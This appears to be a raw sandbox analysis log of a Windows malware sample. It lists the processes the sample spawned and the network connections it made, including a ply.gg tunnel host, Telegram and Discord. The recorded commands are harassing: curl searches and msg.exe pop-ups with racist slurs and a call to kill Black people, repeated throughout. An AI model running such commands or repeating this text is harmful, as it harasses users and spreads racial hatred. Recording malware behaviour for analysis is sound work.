"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=17000,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17004 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=17604,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17612 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=17656,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17792 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=17944,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=17968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=18172,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18180 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=18112,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=18472,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18488 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=18676,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=18824,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=18872 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --always-read-main-dll --field-trial-handle=19040,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --always-read-main-dll --field-trial-handle=19216,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19240 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --always-read-main-dll --field-trial-handle=19580,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=19768,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19776 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=19940,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=19936 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

Network

Country Destination Domain Proto
US 8.8.8.8:53 sky-aerial-derby.glitch.me udp
US 151.101.2.59:443 sky-aerial-derby.glitch.me tcp
US 192.124.249.41:80 crl.starfieldtech.com tcp
US 151.101.67.3:80 ocsp.int-r1.certainly.com tcp
US 151.101.2.59:443 sky-aerial-derby.glitch.me tcp
N/A 127.0.0.1:49803 tcp
N/A 127.0.0.1:49810 tcp
US 162.159.129.232:443 media.discordapp.net tcp
GB 142.250.180.3:80 c.pki.goog tcp
US 162.159.129.232:443 media.discordapp.net tcp
N/A 127.0.0.1:49844 tcp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:49849 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.180.3:80 c.pki.goog tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 150.171.27.11:80 edge.microsoft.com tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 95.100.153.132:443 copilot.microsoft.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
GB 142.250.179.228:443 www.google.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 niggafart.com udp
US 8.8.8.8:53 niggafart.com udp
US 104.21.66.212:443 niggafart.com udp
US 104.21.66.212:443 niggafart.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 95.100.153.147:443 www.bing.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 xpaywalletcdn.azureedge.net udp
US 8.8.8.8:53 xpaywalletcdn.azureedge.net udp
US 13.107.246.64:443 xpaywalletcdn.azureedge.net tcp
GB 142.250.179.228:443 www.google.com tcp
US 162.159.128.233:443 discord.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 13.107.6.158:80 edge-http.microsoft.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.180.3:80 c.pki.goog tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 104.21.66.212:443 niggafart.com udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
